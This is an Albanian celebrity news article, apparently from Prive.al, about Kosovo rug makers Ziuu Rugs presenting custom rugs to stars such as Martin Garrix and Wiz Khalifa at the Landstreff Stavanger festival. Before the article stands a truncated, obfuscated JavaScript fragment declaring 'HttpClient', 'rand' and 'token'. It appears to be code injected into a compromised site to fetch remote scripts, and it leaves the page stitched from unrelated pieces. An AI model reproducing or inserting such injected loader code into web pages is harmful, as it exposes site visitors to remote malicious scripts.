;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Dhuratat kosovare për super yjet botërorë, çka u tha në prapaskenë

By

Javës që shkoi, në Norvegji, Landstreff Stavanger mblodhi yjet më të njohur të muzikës në edicionin e radhës së festivalit.

Aty nuk munguan shqiptarët, por jo vetëm në rolin e të pranishmëve.

Dhurata ‘kosovare’ u dhanë për yjet më të mëdhenj të skenës si Martin Garrix e Wiz Khalifa.

 

View this post on Instagram

 

A post shared by ZiuuRugs (@ziuurugs)

Në prapaskena, ata pranuan tapetë të personalizuar, realizuar nga djem entuziast e kreativ kosovarë.

Në një prononcim për Prive.al, Arbidon Kryeziu nga ‘Ziuu rugs’, tregoi më shumë se si arritën të depërtojnë me punën e tyre tek këta super yje botërorë.

‘Kemi marrë ftesën direkt nga skena e festivalit Landstreff Stavanger, ku menaxhmenti, përfaqësuar nga një shqiptar – inxhinieri i ëndrrave, Art Shabanaj dhe norvegjezi Vidar Ladstein– na shkroi një kapitull të ri përmes telefonatave te vazhdueshme. Ai na ndau vizionin e tyre për festivalin dhe ne iu përgjigjëm me idetë tona. Së bashku, u pajtuam të sjellim artin e Ziuu Rugs për të gjithë pjesëmarrësit, duke përzier kulturën dhe stilin në një harmoni të rrallë’, u shpreh ai.

Kryeziu foli edhe për ndjesitë e të takuarit artistë të kalibrit të tillë.

‘Ishte një ndjesi e papërshkrueshme kur morëm vëmendjen e ndritshme të yjeve të skenës si Wiz Khalifa, Metro. Boomin, Martin Garrix, Timmy Trumpet. Kur ata panë tapetin tonë, dëshira për të njohur duart që kishin krijuar një veprë të tillë ishte e menjëhershme. Një takim u caktua jo vetëm për të shprehur falënderimet e tyre, por edhe për të ndarë ide për të ardhmen’, deklaroi ai.

 

View this post on Instagram

 

A post shared by ZiuuRugs (@ziuurugs)

Të pyetur mbi Kosovën, djemtë sigurisht që morën feedback nga artistët, përfshirë edhe Garrix i cili mesa duket do kthehet sërish për Sunny Hill Festival.

‘Po, sigurisht, sepse prezantimi ynë ka qenë që jemi nga Kosova dhe sigurisht që e kanë vlerësuar Kosovën dhe e kanë ditur ku është, Padyshim, Martin Garrix është tejet i emocionuar për të performuar në Sunny Hill Festival. duke u shprehur i entuziazmuar për mundësinë që do të ketë për të ndarë muzikën dhe energjinë e tij me publikun kosovar. Sunny Hill ka fituar një reputacion të shkëlqyer për mikpritjen e tij dhe atmosferën elektrizuese, dhe kjo vetëm shton në pritshmërinë e Garrix për performancën e tij.Por sigurisht pa pasur dëshirë të mbivlerësojmë veten apo paraqitjen tonë, por personalisht, Wiz Khalifa na ka thënë që pas këtij takimi me ju kam edhe shumë përshtypje më të mira për kompaninë tuaj, si dhe shtetin tuaj, sepse keni treguar respekt për mua, dhe sigurisht që ishte kënaqësi edhe për ne që kemi lënë disa kujtime të bukura këtu në Norvegji’, deklaroi Kryeziu për Prive.al

Planet për në vazhdim janë për të tjera pjesëmarrje e bashkëpunime me organizime të mëdha si ky që sapo kaluan. /Prive.al

Artikuj të ngjashëm